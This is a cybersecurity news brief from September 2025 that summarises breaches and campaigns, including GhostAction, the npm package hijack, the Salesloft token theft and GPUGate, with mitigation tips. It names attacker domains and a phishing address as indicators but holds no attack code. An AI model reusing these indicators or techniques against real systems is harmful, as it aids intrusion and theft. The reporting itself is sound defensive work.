Svoboda Cybersecurity Brief September 09, 2025
Sep 09, 2025bulletproof VPN - stay anonymous
Vietnam’s National Credit Agency Breach Exposes 160M Records
Hackers associated with ShinyHunters breached Vietnam’s National Credit Information Center (CIC), exfiltrating 160 million records containing PII, credit data, military IDs, and financial records. The attack exploited an n-day vulnerability in EOL software, with no ransom demanded.
Source: DataBreaches.net
GhostAction GitHub Attack Compromises 3,325 Secrets Across 817 Repositories
A supply chain attack dubbed GhostAction injected malicious GitHub Actions workflows to steal PyPI, npm, DockerHub, and AWS credentials. The attacker exfiltrated data via HTTP POST to a rogue domain (bold-dhawan.45-139-104-115.plesk.page). Over 9 npm and 15 PyPI packages remain at risk.
Impact: Unauthorized access to CI/CD pipelines and potential package tampering.
Mitigation: Rotate exposed secrets, audit workflows, and enforce MFA for maintainers.
Source: BleepingComputer
Salesloft GitHub Breach Led to Salesforce OAuth Token Theft
UNC6395 compromised Salesloft’s GitHub account (March–June 2025), leading to the theft of Drift OAuth tokens used to access Salesforce data. Attackers targeted AWS keys, Snowflake tokens, and support tickets from 700+ organizations, including Google and Zscaler.
Source: The Hacker News
Cisco ASA Devices Targeted in Mass Scanning Campaign
GreyNoise observed 25,000+ IPs scanning Cisco ASA devices for vulnerabilities, with 80% of traffic from a Brazilian botnet. Activity suggests pre-exploitation reconnaissance for potential zero-days or unpatched flaws.
Impact: Potential exploitation of Cisco ASA vulnerabilities.
Mitigation: Patch ASA devices, block scanning IPs, and restrict external access to WebVPN/Telnet/SSH.
Source: BleepingComputer
NPM Supply Chain Attack Hijacks Packages with 2B Weekly Downloads
Attackers phished a maintainer (support@npmjs.help) to push malware-laden updates to 18 popular packages (e.g., debug, chalk). The malware hijacks crypto transactions by rewriting wallet addresses in real-time.
Impact: Browser-based financial theft for Ethereum, Bitcoin, and Solana users.
Mitigation: Verify package integrity, use lockfiles, and monitor for anomalous transactions.
Source: KrebsOnSecurity
GPUGate Malware Evades Detection Using GPU-Based Decryption
A campaign targeting IT firms in Western Europe delivers malware via Google Ads spoofing GitHub commits. The payload uses GPU-driven encryption to evade sandboxes and drops PowerShell scripts for persistence.
Impact: Data exfiltration and secondary payload deployment.
Mitigation: Block gitpage[.]app, enforce application whitelisting.
Source: The Hacker News
Lovesac Confirms RansomHub Ransomware Attack
The furniture retailer Lovesac disclosed a February 2025 breach by RansomHub, exposing employee/customer PII. No ransomware payment was confirmed.
Source: BleepingComputer
Signal Launches E2E Encrypted Cloud Backups
Signal’s new backup feature uses 64-character recovery keys to encrypt chats, with paid tiers offering 100GB storage. Media is retained for 45 days by default.
Source: BleepingComputer
CISA Delays Critical Infrastructure Cyber Reporting Rule to 2026
CISA postponed the CIRCIA rule mandating 72-hour incident reporting for critical infrastructure to May 2026, citing regulatory adjustments.
Source: DataBreaches.net
Wealthsimple Discloses Supply Chain Breach Affecting 1% of Users
A compromised third-party software package exposed SINs, bank details, and IDs for <1% of Wealthsimple’s customers. No fund theft occurred.
Source: SecurityWeek
Share this brief: https://svo.bz/SX7Y
If you want to support us, you can donate here: Donate